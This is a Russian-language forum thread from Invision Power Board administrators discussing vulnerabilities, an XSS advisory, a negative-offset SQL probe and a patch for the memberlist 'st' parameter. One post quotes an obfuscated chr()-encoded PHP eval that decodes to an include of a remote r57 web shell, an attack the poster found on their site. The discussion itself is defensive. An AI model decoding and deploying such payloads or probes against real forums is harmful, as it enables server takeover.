Перейти к контенту

Намек на новую дыру?


Рекомендуемые сообщения

2yarweb

 

да анекдот это, а не уязвимость.

see http://www.sysman.ru/index.php?showtopic=4118

никакой там важной информации нет. Конечно если не считать текущее unix-time сервера важной инфой :D

Ссылка на комментарий
Поделиться на других сайтах

  • 1 месяц спустя...

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116).-chr(116).-chr(112).-chr(58).-chr(47).-chr(47).-chr(114). chr(115). chr(116). chr(46). chr(118). chr(111).-chr(105).-chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108).-chr(111).-chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108).-chr(108).-chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

 

Ребят, подскажите, как расшифрофать строку? Достали уже. :D

(дефисы добавлены мной )

Ссылка на комментарий
Поделиться на других сайтах

echo chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116).-chr(116).-chr(112).-chr(58).-chr(47).-chr(47).-chr(114). chr(115). chr(116). chr(46). chr(118). chr(111).-chr(105).-chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108).-chr(111).-chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108).-chr(108).-chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32)
Ссылка на комментарий
Поделиться на других сайтах

23 июня, 2006

Программа: Invision Power Board 2.1.6, возможно более ранние версии.

 

Опасность: Низкая

 

Описание:

Уязвимость позволяет удаленному пользователю произвести XSS нападение.

 

Уязвимость существует из-за недостаточной обработки входных данных, передаваемых в шестнадцатеричных эквивалентах HTML элементов. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

 

обычный xss.. вот и ответ на вопрос по этому (echo chr(105). chr(110). chr(99). chr(108). chr(117). и т.д.)

Ссылка на комментарий
Поделиться на других сайтах

2yarweb

 

да анекдот это, а не уязвимость.

see http://www.sysman.ru/index.php?showtopic=4118

никакой там важной информации нет. Конечно если не считать текущее unix-time сервера важной инфой :D

А префикс таблиц? )

 

Тоже немаловажная информация..

Ссылка на комментарий
Поделиться на других сайтах

да фигня это всё. У 60% это ibf

Предлагаешь взломать 40% IPB форумов? :D

 

Знаешь, я всегда действовал по-принципу, если хоть у одого человека проблемы с моим форумом - я его на сутки выключу, но потом он будет работать как следует!

 

Где один - там милионы..

Изменено пользователем Destruction
Ссылка на комментарий
Поделиться на других сайтах

Ввёл вот это: /index.php?act=members&st=%20-1
[sql%20code] Выдало ошибку. Это что дыра?[/quote]


файл sources/action_public/memberlist.php

находим:
		//-----------------------------------------
	// Test for input 
	//-----------------------------------------

	if (isset($this->ipsclass->input['st']))		  $this->first	   = intval($this->ipsclass->input['st']);

(строка 118 примерно)

 

меняем на

		//-----------------------------------------
	// Test for input 
	//-----------------------------------------

	if (isset($this->ipsclass->input['st']))		  $this->first	   = abs(intval($this->ipsclass->input['st']));

 

Версия 2.1.6

Ссылка на комментарий
Поделиться на других сайтах

Тупость.

Таких мест всегда были десятками.

эта st по-моему никогда не контролировалась на отрицательное число.

Я вообще даже больше скажу. st никогда к intval не приводилась, потому что st - это LIMIT, а использование UNION + LIMIT/ORDER BY не разрешается (99% запросов в IPB с LIMIT содержат ORDER BY по тому или иному полю).

Т.е. даже если intval'а не будет, всё-равно хэша не получат, а получат лишь ошибку.

Но конечно были и исключения, например Search.php

Ссылка на комментарий
Поделиться на других сайтах

×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.